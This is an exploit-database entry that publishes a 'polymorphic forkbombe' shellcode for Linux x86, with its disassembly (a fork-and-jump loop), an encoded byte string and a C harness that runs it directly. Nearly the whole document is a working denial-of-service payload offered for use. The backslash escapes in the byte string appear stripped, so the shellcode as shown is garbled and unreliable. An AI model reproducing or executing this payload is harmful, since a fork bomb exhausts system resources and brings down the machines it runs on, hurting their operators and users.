[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux x86 polymorphic forkbombe - 30 bytes
# Published : 2010-04-21
# Author : Jonathan Salwan
# Previous Title : linux/x86 sends "Phuck3d!" to all terminals (60 bytes) shellcode
# Next Title : 34 bytes setreud(getuid(), getuid()) & execve("/bin/sh") Shellcode
/*
Title: Linux x86 polymorphic forkbombe - 30 bytes
Author: Jonathan Salwan <submit@shell-storm.org>
Web: http://www.shell-storm.org
! Database of shellcodes: http://www.shell-storm.org/shellcode/
Disassembly of section .text:
08048054 <_a>:
8048054: b0 02 mov $0x2,%al
8048056: cd 80 int $0x80
8048058: eb fa jmp 8048054 <_a>
*/
#include <stdio.h>
char shellcode[] = "xebx11x5ex31xc9xb1x06x80"
"x6cx0exffx01x80xe9x01x75"
"xf6xebx05xe8xeaxffxffxff"
"xb1x03xcex81xecxfb";
int main()
{
fprintf(stdout,"Lenght: %dn",strlen(shellcode));
(*(void (*)()) shellcode)();
}